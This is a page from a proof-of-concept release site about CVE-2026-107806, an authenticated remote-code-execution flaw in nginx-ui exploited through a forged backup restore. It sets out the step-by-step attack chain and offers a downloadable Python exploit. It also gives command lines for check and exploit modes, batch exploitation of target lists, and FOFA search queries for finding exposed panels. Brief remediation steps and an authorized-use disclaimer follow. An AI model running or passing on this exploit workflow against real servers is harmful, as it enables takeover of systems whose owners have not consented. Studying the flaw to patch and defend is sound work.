POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Web appcritical

CVE-2026-107806 — nginx-ui 2.3.8–2.4.x Authenticated RCE (Forged Backup Restore / TestConfigCmd)

October 10, 2026 · 60 views

0xJacky/nginx-ui >=2.3.8 <2.5.0: admin JWT can download backup, tamper app.ini TestConfigCmd in re-signed zip, POST /api/restore + /api/nginx/test → shell (CWE-94). CVSS 4.0 9.4 Critical PR:H. Not CVE-2026-42238. Fixed 2.5.0. Python PoC: check/exploit, batch url|JWT. Marker POCBIT-107806-OK.

#nginx-ui#nginx#rce#code-injection#cwe-94#authenticated#critical#devops#backup-restore

CVE:

CVE-2026-107806

Date:

2026-10-10

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-107806 — nginx-ui (0xJacky/nginx-ui) — authenticated remote code execution via forged portable backup restore overwriting app.ini → TestConfigCmd executed on POST /api/nginx/test (CWE-94).

| | | |---|---| | Affected | ≥ 2.3.8, < 2.5.0 | | Fixed | 2.5.0 (GHSA-p393-cf76-4jmr) | | CVSS 4.0 | 9.4 Critical — PR:H (admin JWT required) | | Verify marker | POCBIT-107806-OK |

Not the same as CVE-2026-42238 (unauthenticated install-window restore); 2.3.8 added auth on restore, but post-auth trust on attacker-supplied AES backup key remained until 2.5.0.

PoC page: https://pocbit.org/pocs/cve-2026-107806

GitHub: murrez/CVE-2026-107806

CVE.org: CVE-2026-107806

Attack chain (summary)

  1. GET /api/backup — encrypted backup; read X-Backup-Security (key_b64:iv_b64).
  2. Decrypt nginx-ui.zip, patch app.ini → [nginx] TestConfigCmd.
  3. Re-encrypt, update manifest.json, re-sign manifest.sig (nginx-ui-backup-signing-v1: + AES key).
  4. POST /api/restore with malicious zip.
  5. POST /api/nginx/test — runs TestConfigCmd via /bin/sh -c.

Bundled tool (Python 3)

Download cve-2026-107806.py — writes poc.py, requirements.txt, targets.example.txt.

python cve-2026-107806.py
pip install -r requirements.txt

python poc.py -u http://127.0.0.1:8080 --mode check
python poc.py -u https://panel.example --token 'eyJhbG...' --mode check --json
python poc.py -u https://panel.example --token 'eyJhbG...' --mode exploit --insecure
python poc.py -u https://panel.example --token '...' --secure-session '...' --mode exploit
python poc.py --list targets.txt --mode exploit -j 5 --insecure

List format: url, url|JWT, or url|JWT|SECURE_SESSION_ID.

Outputs: cve_2026_107806_exploit.jsonl, hits.txt, exploited.txt.

Obtain JWT from authorized admin session (browser DevTools / login flow). 2FA: pass --secure-session.

Discovery hints (your assets only)

title="Nginx UI" || body="nginx-ui"
port="9000" || port="8080"

FOFA does not prove vulnerable version — use --mode check with valid admin token.

Remediation

  1. Upgrade nginx-ui to ≥ 2.5.0.
  2. Restrict admin panel to management networks; MFA on admin accounts.
  3. Audit backup/restore and nginx/test API usage in logs.

Legal and ethical use

Authorized security testing only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →